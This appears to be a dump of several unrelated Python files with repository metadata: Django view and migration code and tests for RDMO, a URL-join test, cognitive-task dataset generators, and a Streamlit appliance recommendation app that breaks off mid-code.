c0500f9b6caff9106a254a05e0d0e8018fc8db28
[ "Apache-2.0" ]
77
2016-08-09T11:40:20.000Z
2022-03-06T11:03:26.000Z
rdmo/projects/tests/test_view_project_create_import.py
MSpenger/rdmo
c0500f9b6caff9106a254a05e0d0e8018fc8db28
[ "Apache-2.0" ]
377
2016-07-01T13:59:36.000Z
2022-03-30T13:53:19.000Z
rdmo/projects/tests/test_view_project_create_import.py
MSpenger/rdmo
c0500f9b6caff9106a254a05e0d0e8018fc8db28
[ "Apache-2.0" ]
47
2016-06-23T11:32:19.000Z
2022-03-01T11:34:37.000Z
import os import re from pathlib import Path import pytest from django.urls import reverse from rdmo.core.constants import VALUE_TYPE_FILE from ..models import Project, Value users = ( ('owner', 'owner'), ('manager', 'manager'), ('author', 'author'), ('guest', 'guest'), ('user', 'user'), ('site', 'site'), ('anonymous', None), ) change_project_permission_map = { 'owner': [1, 2, 3, 4, 5], 'manager': [1, 3, 5], 'api': [1, 2, 3, 4, 5], 'site': [1, 2, 3, 4, 5] } projects = [1, 2, 3, 4, 5] @pytest.mark.parametrize('username,password', users) def test_project_create_import_get(db, client, username, password): client.login(username=username, password=password) url = reverse('project_create_import') response = client.get(url) if password: assert response.status_code == 302 assert response.url == '/projects/' else: assert response.status_code == 302 assert response.url.startswith('/account/login/') @pytest.mark.parametrize('username,password', users) def test_project_create_import_post_error(db, settings, client, username, password): client.login(username=username, password=password) url = reverse('project_create_import') response = client.post(url, { 'method': 'wrong' }) if password: assert response.status_code == 400 else: assert response.status_code == 302 assert response.url.startswith('/account/login/') @pytest.mark.parametrize('username,password', users) def test_project_create_import_post_upload_file(db, settings, client, username, password): client.login(username=username, password=password) url = reverse('project_create_import') xml_file = os.path.join(settings.BASE_DIR, 'xml', 'project.xml') with open(xml_file, encoding='utf8') as f: response = client.post(url, { 'method': 'upload_file', 'uploaded_file': f }) if password: assert response.status_code == 200 assert b'Create project from project.xml' in response.content else: assert response.status_code == 302 assert response.url.startswith('/account/login/') @pytest.mark.parametrize('username,password', users) def test_project_create_import_post_upload_file_error(db, settings, client, username, password): client.login(username=username, password=password) url = reverse('project_create_import') xml_file = os.path.join(settings.BASE_DIR, 'xml', 'error.xml') with open(xml_file, encoding='utf8') as f: response = client.post(url, { 'method': 'upload_file', 'uploaded_file': f }) if password: assert response.status_code == 400 assert b'Files of this type cannot be imported.' in response.content else: assert response.status_code == 302 assert response.url.startswith('/account/login/') @pytest.mark.parametrize('username,password', users) def test_project_create_import_post_upload_file_empty(db, client, username, password): client.login(username=username, password=password) url = reverse('project_create_import') response = client.post(url, { 'method': 'upload_file' }) if password: assert response.status_code == 400 assert b'There has been an error with your import.' in response.content else: assert response.status_code == 302 assert response.url.startswith('/account/login/') @pytest.mark.parametrize('username,password', users) def test_project_create_import_post_import_file(db, settings, client, files, username, password): client.login(username=username, password=password) projects_count = Project.objects.count() # upload file url = reverse('project_create_import') xml_file = os.path.join(settings.BASE_DIR, 'xml', 'project.xml') with open(xml_file, encoding='utf8') as f: response = client.post(url, { 'method': 'upload_file', 'uploaded_file': f }) if password: assert response.status_code == 200 # get keys from the response keys = re.findall(r'name=\"(.*?)\"', response.content.decode()) # import file data = {key: ['on'] for key in keys} data.update({'method': 'import_file'}) response = client.post(url, data) # check if all the files are where are supposed to be for file_value in Value.objects.filter(value_type=VALUE_TYPE_FILE): assert Path(settings.MEDIA_ROOT).joinpath(file_value.file.name).exists() # assert that the project exists and that there are values if password: project = Project.objects.order_by('updated').last() assert response.status_code == 302 assert response.url == '/projects/{}/'.format(project.pk) # a new project, new values values assert Project.objects.count() == projects_count + 1 assert project.values.count() > 0 else: assert response.status_code == 302 assert response.url.startswith('/account/login/') # no new project was created assert Project.objects.count() == projects_count else: assert response.status_code == 302 assert response.url.startswith('/account/login/') @pytest.mark.parametrize('username,password', users) def test_project_create_import_post_empty(db, settings, client, username, password): client.login(username=username, password=password) projects_count = Project.objects.count() # upload file url = reverse('project_create_import') xml_file = os.path.join(settings.BASE_DIR, 'xml', 'project.xml') with open(xml_file, encoding='utf8') as f: response = client.post(url, { 'method': 'upload_file', 'uploaded_file': f }) if password: assert response.status_code == 200 response = client.post(url, { 'method': 'import_file' }) # check if all the files are where are supposed to be for file_value in Value.objects.filter(value_type=VALUE_TYPE_FILE): assert Path(settings.MEDIA_ROOT).joinpath(file_value.file.name).exists() # assert that the project exists, but that there are not values if password: new_project = Project.objects.order_by('updated').last() assert response.status_code == 302 assert response.url == '/projects/{}/'.format(new_project.id) # a new project, but no values assert Project.objects.count() == projects_count + 1 assert new_project.values.count() == 0 else: assert response.status_code == 302 assert response.url.startswith('/account/login/') # no new project was created assert Project.objects.count() == projects_count else: assert response.status_code == 302 assert response.url.startswith('/account/login/') @pytest.mark.parametrize('username,password', users) def test_project_create_import_post_import_project(db, settings, client, username, password): client.login(username=username, password=password) url = reverse('project_create_import') response = client.post(url, { 'method': 'import_project' }) if password: assert response.status_code == 400 else: assert response.status_code == 302 assert response.url.startswith('/account/login/')
33.411504
97
0.651304
912
7,551
5.245614
0.14693
0.096572
0.083612
0.100334
0.849289
0.845109
0.834866
0.832776
0.832776
0.789298
0
0.015646
0.229771
7,551
225
98
33.56
0.806912
0.053106
0
0.692771
0
0
0.138994
0.023539
0
0
0
0
0.26506
1
0.048193
false
0.204819
0.168675
0
0.216867
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
7
b57b1aa759e0d8828d52aeccd69678fc33d7f578
1,866
py
Python
tests/test_utils.py
mozillazg/huskar-python
f62a2d3636b2804a552bf59f76903cf2841d75c9
[ "MIT" ]
5
2019-09-29T03:09:31.000Z
2019-11-01T15:38:26.000Z
tests/test_utils.py
mozillazg/huskar-python
f62a2d3636b2804a552bf59f76903cf2841d75c9
[ "MIT" ]
4
2019-09-27T03:58:55.000Z
2019-09-27T06:34:10.000Z
tests/test_utils.py
mozillazg/huskar-python
f62a2d3636b2804a552bf59f76903cf2841d75c9
[ "MIT" ]
4
2019-09-27T06:03:30.000Z
2019-10-23T09:54:08.000Z
from __future__ import absolute_import import pytest from huskar_sdk_v2.six import unicode from huskar_sdk_v2.utils import Counter, join_url def test_counter(): c = Counter(1) assert c.get() == 1 assert unicode(c) == '<Counter init=1 now=1>' c.incr() assert c.get() == 2 assert unicode(c) == '<Counter init=1 now=2>' c.reset() assert c.get() == 1 assert unicode(c) == '<Counter init=1 now=1>' @pytest.mark.parametrize('input,output', [ (['http://example.com:8080', '/api', 'test', '233'], 'http://example.com:8080/api/test/233'), (['http://example.com:8080', '/api/', 'test/', '233'], 'http://example.com:8080/api/test/233'), (['http://example.com:8080', '/api/', '/test/', '233'], 'http://example.com:8080/api/test/233'), (['http://example.com:8080', '/api', '/test/', '/233'], 'http://example.com:8080/api/test/233'), (['http://example.com', '/api/', 'test/', '233'], 'http://example.com/api/test/233'), (['http://example.com', '/api/', 'test/', '233/'], 'http://example.com/api/test/233/'), (['http://example.com', '/api/test/', '233'], 'http://example.com/api/test/233'), (['http://example.com', '/api/test/', '/233/'], 'http://example.com/api/test/233/'), (['example.com', '/api/test/', '/233/'], 'http://example.com/api/test/233/'), (['example.com:8080', '/api/test/', '/233/'], 'http://example.com:8080/api/test/233/'), (['example.com:8080', '/api/test/'], 'http://example.com:8080/api/test/'), (['example.com:8080', '/api/test'], 'http://example.com:8080/api/test'), (['example.com:8080', 'api/test/'], 'http://example.com:8080/api/test/'), (['example.com:8080', 'api/test'], 'http://example.com:8080/api/test'), ]) def test_join_url(input, output): assert join_url(*input) == output
33.927273
59
0.568596
257
1,866
4.07393
0.136187
0.267431
0.294174
0.292264
0.770774
0.770774
0.770774
0.743075
0.743075
0.743075
0
0.091603
0.157556
1,866
54
60
34.555556
0.574427
0
0
0.369565
0
0
0.522508
0
0
0
0
0
0.152174
1
0.043478
false
0
0.086957
0
0.130435
0
0
0
0
null
1
1
1
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
b5965dd6b41565097bdeef284636baeb744a016c
12,625
py
Python
cgtasknet/tasks/reduce/go.py
Pugavkomm/-test-multy_cognitive_tasks
858e1f28813f09340211c57268daf4f8581a3459
[ "MIT" ]
null
null
null
cgtasknet/tasks/reduce/go.py
Pugavkomm/-test-multy_cognitive_tasks
858e1f28813f09340211c57268daf4f8581a3459
[ "MIT" ]
31
2021-12-28T09:44:10.000Z
2022-03-21T14:42:28.000Z
cgtasknet/tasks/reduce/go.py
Pugavkomm/cgtasknet
858e1f28813f09340211c57268daf4f8581a3459
[ "MIT" ]
1
2021-12-03T07:03:14.000Z
2021-12-03T07:03:14.000Z
from typing import NamedTuple, Optional, Tuple, Union import numpy as np from cgtasknet.tasks.reduce.reduce_task import ( _generate_random_intervals, _generate_values, ReduceTaskCognitive, ReduceTaskParameters, ) class GoTaskParameters(NamedTuple): dt: float = ReduceTaskParameters().dt trial_time: float = 0.75 answer_time: float = ReduceTaskParameters().answer_time value: Union[float, list, tuple] = 1.0 # task_type: str = "Go" # Go, Rt, Dl negative_shift_trial_time: float = ReduceTaskParameters().negative_shift_trial_time positive_shift_trial_time: float = ReduceTaskParameters().positive_shift_trial_time class GoRtTaskParameters(NamedTuple): dt: float = ReduceTaskParameters().dt trial_time: float = 0.75 answer_time: float = ReduceTaskParameters().answer_time negative_shift_answer_time: float = 0.0 positive_shift_answer_time: float = 0.0 value: Union[float, list, tuple] = 1.0 # task_type: str = "Go" # Go, Rt, Dl negative_shift_trial_time: float = ReduceTaskParameters().negative_shift_trial_time positive_shift_trial_time: float = ReduceTaskParameters().positive_shift_trial_time class GoTaskRandomModParameters(NamedTuple): go: GoTaskParameters = GoTaskParameters() n_mods: int = 2 class GoRtTaskRandomModParameters(NamedTuple): go_rt: GoRtTaskParameters = GoRtTaskParameters() n_mods: int = 2 class GoDlTaskParameters(NamedTuple): go: GoTaskParameters = GoTaskParameters() delay: float = 1.0 negative_shift_delay_time: float = 0.0 positive_shift_delay_time: float = 0.0 class GoDlTaskRandomModParameters(NamedTuple): go_dl: GoDlTaskParameters = GoDlTaskParameters() n_mods: int = 2 class GoTask(ReduceTaskCognitive): def __init__( self, params: GoTaskParameters = GoTaskParameters(), batch_size: int = 1, mode: str = "random", enable_fixation_delay: bool = False, uniq_batch: bool = False, ) -> None: super().__init__( params=params, batch_size=batch_size, mode=mode, enable_fixation_delay=enable_fixation_delay, uniq_batch=uniq_batch, ) self._ob_size = 2 self._act_size = 2 def _identical_batches(self, batch_size: int = 1) -> Tuple[np.ndarray, np.ndarray]: dt = self._params.dt trial_time = _generate_random_intervals( dt, self._params.trial_time, self._params.negative_shift_trial_time, self._params.positive_shift_trial_time, ) answer_time = round(self._params.answer_time / dt) inputs = np.zeros((trial_time + answer_time, batch_size, self._ob_size)) target_outputs = np.zeros( (trial_time + answer_time, batch_size, self._act_size) ) values = _generate_values(self._mode, batch_size, self._params.value) inputs[:trial_time, :, 0] = 1 inputs[:, :, 1] = values target_outputs[:, :, 0] = inputs[:, :, 0] target_outputs[trial_time:, :, 1] = values return inputs, target_outputs def _one_dataset(self) -> Tuple[np.ndarray, np.ndarray]: if self._uniq_batch: return self._unique_every_batch() else: return self._identical_batches(self._batch_size) def one_dataset(self) -> Tuple[np.ndarray, np.ndarray]: """ """ return self._one_dataset() @property def name(self) -> str: return "Go" class GoRtTask(GoTask): def __init__( self, params: GoRtTaskParameters = GoRtTaskParameters(), batch_size: int = 1, mode: str = "random", enable_fixation_delay: bool = False, uniq_batch: bool = False, ) -> None: super().__init__( params=params, batch_size=batch_size, mode=mode, enable_fixation_delay=enable_fixation_delay, uniq_batch=uniq_batch, ) self._ob_size = 2 self._act_size = 2 def _identical_batches(self, batch_size: int = 1) -> Tuple[np.ndarray, np.ndarray]: dt = self._params.dt trial_time = _generate_random_intervals( dt, self._params.trial_time, self._params.negative_shift_trial_time, self._params.positive_shift_trial_time, ) answer_time = _generate_random_intervals( dt, self._params.answer_time, self._params.negative_shift_answer_time, self._params.positive_shift_answer_time, ) inputs = np.zeros((trial_time + answer_time, batch_size, self._ob_size)) target_outputs = np.zeros( (trial_time + answer_time, batch_size, self._act_size) ) values = _generate_values(self._mode, batch_size, self._params.value) inputs[:, :, 0] = 1 inputs[trial_time:, :, 1] = values target_outputs[:trial_time, :, 0] = 1 target_outputs[trial_time:, :, 1] = values return inputs, target_outputs @property def name(self) -> str: return "GoRt" class GoDlTask(GoTask): def __init__( self, params: Union[GoDlTaskParameters, GoRtTaskParameters] = GoDlTaskParameters(), batch_size: int = 1, mode: str = "random", enable_fixation_delay: bool = False, uniq_batch: bool = False, ) -> None: super().__init__( params=params, batch_size=batch_size, mode=mode, enable_fixation_delay=enable_fixation_delay, uniq_batch=uniq_batch, ) self._ob_size = 2 self._act_size = 2 def _identical_batches(self, batch_size: int = 1) -> Tuple[np.ndarray, np.ndarray]: dt = self._params.go.dt trial_time = _generate_random_intervals( dt, self._params.go.trial_time, self._params.go.negative_shift_trial_time, self._params.go.positive_shift_trial_time, ) answer_time = round(self._params.go.answer_time / dt) delay_time = _generate_random_intervals( dt, self._params.delay, self._params.negative_shift_delay_time, self._params.positive_shift_delay_time, ) inputs = np.zeros( (trial_time + answer_time + delay_time, batch_size, self._ob_size) ) target_outputs = np.zeros( (trial_time + answer_time + delay_time, batch_size, self._act_size) ) values = _generate_values(self._mode, batch_size, self._params.go.value) inputs[: trial_time + delay_time, :, 0] = 1 inputs[:trial_time, :, 1] = values target_outputs[:, :, 0] = inputs[:, :, 0] target_outputs[trial_time + delay_time :, :, 1] = values return inputs, target_outputs @property def name(self) -> str: return "GoDl" class GoTaskRandomMod(GoTask): def __init__( self, params: GoTaskRandomModParameters = GoTaskRandomModParameters(), batch_size: int = 1, mode: str = "random", enable_fixation_delay: bool = False, uniq_batch: bool = False, ): super().__init__( params=params.go, batch_size=batch_size, mode=mode, enable_fixation_delay=enable_fixation_delay, uniq_batch=uniq_batch, ) self._n_mods = params.n_mods self._ob_size += self._n_mods - 1 self._act_size += self._n_mods - 1 def _one_dataset_mod(self, mod: int) -> Tuple[np.ndarray, np.ndarray]: """ Generate a single dataset . Returns: Tuple[np.ndarray, np.ndarray]: [inputs, target outputs] """ temp, temp_outputs = self._one_dataset() t = temp.shape[0] inputs = np.zeros((t, self._batch_size, self._ob_size)) inputs[:, :, 0] = temp[:, :, 0] inputs[:, :, 1 + mod] = temp[:, :, 1] target_outputs = np.zeros((t, self._batch_size, self._act_size)) target_outputs[:, :, 0] = temp_outputs[:, :, 0] target_outputs[:, :, 1 + mod] = temp_outputs[:, :, 1] return inputs, target_outputs def one_dataset(self, mode: Optional[int] = None) -> Tuple[np.ndarray, np.ndarray]: if mode is None: mode = np.random.randint(0, self._n_mods) return self._one_dataset_mod(mode) @property def name(self): return "GoTaskRandomMod" class GoRtTaskRandomMod(GoRtTask): def __init__( self, params: GoRtTaskRandomModParameters = GoRtTaskRandomModParameters(), batch_size: int = 1, mode: str = "random", enable_fixation_delay: bool = False, uniq_batch: bool = False, ): super().__init__( params=params.go_rt, batch_size=batch_size, mode=mode, enable_fixation_delay=enable_fixation_delay, uniq_batch=uniq_batch, ) self._n_mods = params.n_mods self._ob_size += self._n_mods - 1 self._act_size += self._n_mods - 1 def _one_dataset_mod(self, mod: int) -> Tuple[np.ndarray, np.ndarray]: """ Generate a single dataset . Returns: Tuple[np.ndarray, np.ndarray]: [inputs, target outputs] """ temp, temp_outputs = self._one_dataset() t = temp.shape[0] inputs = np.zeros((t, self._batch_size, self._ob_size)) inputs[:, :, 0] = temp[:, :, 0] inputs[:, :, 1 + mod] = temp[:, :, 1] target_outputs = np.zeros((t, self._batch_size, self._act_size)) target_outputs[:, :, 0] = temp_outputs[:, :, 0] target_outputs[:, :, 1 + mod] = temp_outputs[:, :, 1] return inputs, target_outputs def one_dataset(self, mod: Optional[int] = None) -> Tuple[np.ndarray, np.ndarray]: if mod is None: mod = np.random.randint(0, self._n_mods) return self._one_dataset_mod(mod) @property def name(self) -> str: return "GoRtTaskRandomMod" class GoDlTaskRandomMod(GoDlTask): def __init__( self, params: GoDlTaskRandomModParameters = GoDlTaskRandomModParameters(), batch_size: int = 1, mode: str = "random", enable_fixation_delay: bool = False, uniq_batch: bool = False, ): super().__init__( params=params.go_dl, batch_size=batch_size, mode=mode, enable_fixation_delay=enable_fixation_delay, uniq_batch=uniq_batch, ) self._n_mods = params.n_mods self._ob_size += self._n_mods - 1 self._act_size += self._n_mods - 1 def _one_dataset_mod(self, mod: int) -> Tuple[np.ndarray, np.ndarray]: """ Generate a single dataset . Returns: Tuple[np.ndarray, np.ndarray]: [inputs, target outputs] """ temp, temp_outputs = self._one_dataset() t = temp.shape[0] inputs = np.zeros((t, self._batch_size, self._ob_size)) inputs[:, :, 0] = temp[:, :, 0] inputs[:, :, 1 + mod] = temp[:, :, 1] target_outputs = np.zeros((t, self._batch_size, self._act_size)) target_outputs[:, :, 0] = temp_outputs[:, :, 0] target_outputs[:, :, 1 + mod] = temp_outputs[:, :, 1] return inputs, target_outputs def one_dataset(self, mod: Optional[int] = None) -> Tuple[np.ndarray, np.ndarray]: if mod is None: mod = np.random.randint(0, self._n_mods) return self._one_dataset_mod(mod) @property def name(self) -> str: return "GoDlTaskRandomMod" class GoTask1(GoTaskRandomMod): def one_dataset(self, mod=0) -> Tuple[np.ndarray, np.ndarray]: return self._one_dataset_mod(mod) class GoTask2(GoTaskRandomMod): def one_dataset(self, mod=1) -> Tuple[np.ndarray, np.ndarray]: return self._one_dataset_mod(mod) class GoRtTask1(GoRtTaskRandomMod): def one_dataset(self, mod=0) -> Tuple[np.ndarray, np.ndarray]: return self._one_dataset_mod(mod) class GoRtTask2(GoRtTaskRandomMod): def one_dataset(self, mod=1) -> Tuple[np.ndarray, np.ndarray]: return self._one_dataset_mod(mod) class GoDlTask1(GoDlTaskRandomMod): def one_dataset(self, mod=0) -> Tuple[np.ndarray, np.ndarray]: return self._one_dataset_mod(mod) class GoDlTask2(GoDlTaskRandomMod): def one_dataset(self, mod=1) -> Tuple[np.ndarray, np.ndarray]: return self._one_dataset_mod(mod)
32.455013
87
0.615683
1,469
12,625
4.955071
0.072158
0.049457
0.038467
0.043962
0.811513
0.777991
0.741998
0.731831
0.729908
0.688419
0
0.011362
0.27501
12,625
388
88
32.53866
0.783896
0.028832
0
0.667763
1
0
0.00783
0
0
0
0
0
0
1
0.095395
false
0
0.009868
0.039474
0.322368
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
a9422c41c585d862e6be1bcd3cc08926dd6ef04d
162
py
Python
cloudfrontsigner/compat.py
gjo/cloudfrontsigner
d9ee56a62016db927c5541f2f1c6f95e65706928
[ "BSD-3-Clause" ]
null
null
null
cloudfrontsigner/compat.py
gjo/cloudfrontsigner
d9ee56a62016db927c5541f2f1c6f95e65706928
[ "BSD-3-Clause" ]
null
null
null
cloudfrontsigner/compat.py
gjo/cloudfrontsigner
d9ee56a62016db927c5541f2f1c6f95e65706928
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- try: from urllib.parse import parse_qs, urlencode, urlparse except ImportError: from urllib import parse_qs, urlencode, urlparse
23.142857
58
0.722222
21
162
5.47619
0.619048
0.173913
0.226087
0.382609
0.521739
0
0
0
0
0
0
0.007519
0.179012
162
6
59
27
0.857143
0.12963
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.75
0
0.75
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
a9876b4a3505e1f79e53d817367a55021eaac9da
3,009
py
Python
SACWebApp/mainPage/migrations/0013_auto_20201221_2345.py
feng-jj/SAC-Project1
58941f85b805bc993059f89fe913c147da14210e
[ "MIT" ]
1
2020-07-19T01:53:05.000Z
2020-07-19T01:53:05.000Z
SACWebApp/mainPage/migrations/0013_auto_20201221_2345.py
feng-jj/SAC-Project1
58941f85b805bc993059f89fe913c147da14210e
[ "MIT" ]
1
2020-07-15T15:43:17.000Z
2020-07-15T15:43:17.000Z
SACWebApp/mainPage/migrations/0013_auto_20201221_2345.py
feng-jj/SAC-Project1
58941f85b805bc993059f89fe913c147da14210e
[ "MIT" ]
null
null
null
# Generated by Django 3.1.3 on 2020-12-22 04:45 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('mainPage', '0012_auto_20201220_2057'), ] operations = [ migrations.AddField( model_name='advocacy', name='month', field=models.CharField(blank=True, choices=[('January', 'January'), ('February', 'February'), ('March', 'March'), ('April', 'April'), ('May', 'May'), ('June', 'June'), ('July', 'July'), ('August', 'August'), ('September', 'September'), ('October', 'October'), ('November', 'November'), ('December', 'December')], max_length=9, verbose_name='Month'), ), migrations.AddField( model_name='clinical', name='month', field=models.CharField(blank=True, choices=[('January', 'January'), ('February', 'February'), ('March', 'March'), ('April', 'April'), ('May', 'May'), ('June', 'June'), ('July', 'July'), ('August', 'August'), ('September', 'September'), ('October', 'October'), ('November', 'November'), ('December', 'December')], max_length=9, verbose_name='Month'), ), migrations.AddField( model_name='clinical_voca', name='month', field=models.CharField(blank=True, choices=[('January', 'January'), ('February', 'February'), ('March', 'March'), ('April', 'April'), ('May', 'May'), ('June', 'June'), ('July', 'July'), ('August', 'August'), ('September', 'September'), ('October', 'October'), ('November', 'November'), ('December', 'December')], max_length=9, verbose_name='Month'), ), migrations.AddField( model_name='map', name='month', field=models.CharField(blank=True, choices=[('January', 'January'), ('February', 'February'), ('March', 'March'), ('April', 'April'), ('May', 'May'), ('June', 'June'), ('July', 'July'), ('August', 'August'), ('September', 'September'), ('October', 'October'), ('November', 'November'), ('December', 'December')], max_length=9, verbose_name='Month'), ), migrations.AddField( model_name='ov', name='month', field=models.CharField(blank=True, choices=[('January', 'January'), ('February', 'February'), ('March', 'March'), ('April', 'April'), ('May', 'May'), ('June', 'June'), ('July', 'July'), ('August', 'August'), ('September', 'September'), ('October', 'October'), ('November', 'November'), ('December', 'December')], max_length=9, verbose_name='Month'), ), migrations.AddField( model_name='safe_clinic', name='month', field=models.CharField(blank=True, choices=[('January', 'January'), ('February', 'February'), ('March', 'March'), ('April', 'April'), ('May', 'May'), ('June', 'June'), ('July', 'July'), ('August', 'August'), ('September', 'September'), ('October', 'October'), ('November', 'November'), ('December', 'December')], max_length=9, verbose_name='Month'), ), ]
68.386364
361
0.562645
289
3,009
5.778547
0.197232
0.064671
0.082635
0.097006
0.877246
0.877246
0.877246
0.877246
0.877246
0.877246
0
0.015059
0.18345
3,009
43
362
69.976744
0.664632
0.014955
0
0.648649
1
0
0.345712
0.007765
0
0
0
0
0
1
0
false
0
0.027027
0
0.108108
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
a993863a004acd54447e1379e24a652df19906e9
116,198
py
Python
Customer_Recommendation.py
dogudogru/Customer-Recomendation-Project
948e34145af1a753b6171a779b4f7b5b00aa67eb
[ "MIT" ]
1
2022-01-13T11:58:50.000Z
2022-01-13T11:58:50.000Z
Customer_Recommendation.py
dogudogru/Customer-Recomendation-Project
948e34145af1a753b6171a779b4f7b5b00aa67eb
[ "MIT" ]
null
null
null
Customer_Recommendation.py
dogudogru/Customer-Recomendation-Project
948e34145af1a753b6171a779b4f7b5b00aa67eb
[ "MIT" ]
null
null
null
import pandas as pd import numpy as np from PIL import Image,ImageDraw,ImageFont from pandas.core.frame import DataFrame import requests import time from requests.api import options import streamlit as st from PIL import Image import requests from PIL import Image import requests import base64 data = pd.read_csv("data1.csv") data2 = data.drop(data.columns[0],axis=1) data_b = pd.read_csv("data2.csv") data2_b = data_b.drop(data_b.columns[0],axis=1) url_cam = "https://www.bekokibris.com/wp-content/uploads/2020/04/BK9102EYS1.jpg" url_bul = "https://statics.vestel.com.tr/productimages/20264045_r1_900_1254.jpg" url_buzdo = "https://cdn.akakce.com/samsung/samsung-rb50rs334sa-a-kombi-no-frost-x.jpg" im = Image.open(requests.get(url_cam, stream=True).raw) #im = im.resize((500,500)) im2 = Image.open(requests.get(url_bul, stream=True).raw) #im2 = im2.resize((500,500)) im3 = Image.open(requests.get(url_buzdo, stream=True).raw) #im3 = im3.resize((500,500)) st.set_page_config(page_title='Customer Recommendation Project', page_icon=':house_with_garden') #Menü gizleme st.markdown(""" <style> #MainMenu {visibility: hidden;} footer {visibility: hidden;} </style> """, unsafe_allow_html=True) #Tek sayfaya sığdırma padding = 0 st.markdown(f""" <style> .reportview-container .main .block-container{{ padding-top: {padding}rem; padding-right: {padding}rem; padding-left: {padding}rem; padding-bottom: {padding}rem; }} </style> """, unsafe_allow_html=True) st.markdown( """ <style> .reportview-container { background: url("https://www.birbeymetal.com.tr/wp-content/uploads/2019/02/Savin-NY-Website-Background-Web.jpg") } .sidebar .sidebar-content { background: url("https://www.birbeymetal.com.tr/wp-content/uploads/2019/02/Savin-NY-Website-Background-Web.jpg") } </style> """, unsafe_allow_html=True ) options_m = [' ','Çamaşır Makinesi', 'Bulaşık Makinesi'] machine = st.sidebar.selectbox('Ne arıyorsunuz? 👉', options=options_m) dil = ["TR", "EN"] col1, col2, col3, col4, col5,col6,col7,col8,col9,col10,col11,col12 = st.columns([1,1,1,1,1,1,1,1,1,1,1,5]) with col12: dil_secenek = st.radio("Language",dil) st.write('<style>div.row-widget.stRadio > div{flex-direction:row;}</style>', unsafe_allow_html=True) dataf = data2 dataf_b = data2_b ##ÇAMAŞIR brand1 = ["Bosch", "Siemens","Samsung","Electrolux"] brand2 = ["Arçelik", "Vestel","LG","Profilo","Beko"] data4 = data2.copy() for i in range(len(data2['brand'])): if (data2['brand'][i] in brand1): data4['brand'][i] = 3 elif (data2['brand'][i] in brand2): data4['brand'][i] = 2 else: data4['brand'][i] = 1 for i in range(len(data2['capacity'])): if data2['capacity'][i] == "Yüksek Kapasite": data4['capacity'][i] = 3 elif data2['capacity'][i] == "Orta Kapasite": data4['capacity'][i] = 2 else: data4['capacity'][i] = 1 for i in range(len(data2['cycle'])): if data2['cycle'][i] == "Yüksek Devir": data4['cycle'][i] = 3 elif data2['cycle'][i] == "Orta Devir": data4['cycle'][i] = 2 else: data4['cycle'][i] = 1 for i in range(len(data2['size'])): if data2['size'][i] == "Standart üstü": data4['size'][i] = 3 elif data2['size'][i] == "Standart Boyut": data4['size'][i] = 2 else: data4['size'][i] = 1 for i in range(len(data2['energy_usage'])): if data2['energy_usage'][i] == "Çok önemli": data4['energy_usage'][i] = 3 elif data2['energy_usage'][i] == "Önemli": data4['energy_usage'][i] = 2 else: data4['energy_usage'][i] = 1 for i in range(len(data2['blanket'])): if data2['blanket'][i] == "VAR": data4['blanket'][i] = 2 else: data4['blanket'][i] = 1 for i in range(len(data2['wifi'])): if data2['wifi'][i] == "VAR": data4['wifi'][i] = 2 else: data4['wifi'][i] = 1 for i in range(len(data2['load_sensor'])): if data2['load_sensor'][i] == "VAR": data4['load_sensor'][i] = 2 else: data4['load_sensor'][i] = 1 for i in range(len(data2['delay'])): if data2['delay'][i] == "VAR": data4['delay'][i] = 2 else: data4['delay'][i] = 1 for i in range(len(data2['control_panel'])): if data2['control_panel'][i] == "VAR": data4['control_panel'][i] = 2 else: data4['control_panel'][i] = 1 for i in range(len(data2['vapor'])): if data2['vapor'][i] == "VAR": data4['vapor'][i] = 2 else: data4['vapor'][i] = 1 for i in range(len(data2['vapor'])): if data2['vapor'][i] == "VAR": data4['vapor'][i] = 2 else: data4['vapor'][i] = 1 for i in range(len(data2['anti_alergy'])): if data2['anti_alergy'][i] == "VAR": data4['anti_alergy'][i] = 2 else: data4['anti_alergy'][i] = 1 for i in range(len(data2['baby_p'])): if data2['baby_p'][i] == "VAR": data4['baby_p'][i] = 2 else: data4['baby_p'][i] = 1 for i in range(len(data2['sensitive_p'])): if data2['sensitive_p'][i] == "VAR": data4['sensitive_p'][i] = 2 else: data4['sensitive_p'][i] = 1 for i in range(len(data2['child_lock'])): if data2['child_lock'][i] == "VAR": data4['child_lock'][i] = 2 else: data4['child_lock'][i] = 1 puan = 0 data4["puan"] = "" for k in range(len(data2['full_name'])): for j in data4.drop(["full_name","price","image","puan"],axis=1).columns: if j != "child_lock": puan = puan + data4[j][k] else: puan = puan + data4[j][k] data4["puan"][k] = puan puan = 0 dataf["puan"] = data4["puan"] len_lst1 = [] len_lst2 = [] ##BULAŞIK brand1 = ["Bosch", "Siemens","Samsung","Electrolux"] brand2 = ["Arçelik", "Vestel","LG","Profilo","Beko"] data4_b = data2_b.copy() for i in range(len(data2_b['brand'])): if (data2_b['brand'][i] in brand1): data4_b['brand'][i] = 3 elif (data2_b['brand'][i] in brand2): data4_b['brand'][i] = 2 else: data4_b['brand'][i] = 1 for i in range(len(data2_b['capacity'])): if data2_b['capacity'][i] == "Yüksek Kapasite": data4_b['capacity'][i] = 3 elif data2_b['capacity'][i] == "Orta Kapasite": data4_b['capacity'][i] = 2 else: data4_b['capacity'][i] = 1 for i in range(len(data2_b['type_'])): if data2_b['type_'][i] == "Ankastre": data4_b['type_'][i] = 3 elif data2_b['type_'][i] == "Solo": data4_b['type_'][i] = 2 else: data4_b['type_'][i] = 1 for i in range(len(data2_b['size'])): if data2_b['size'][i] == "Standart üstü": data4_b['size'][i] = 3 elif data2_b['size'][i] == "Standart Boyut": data4_b['size'][i] = 2 else: data4_b['size'][i] = 1 for i in range(len(data2_b['energy_usage'])): if 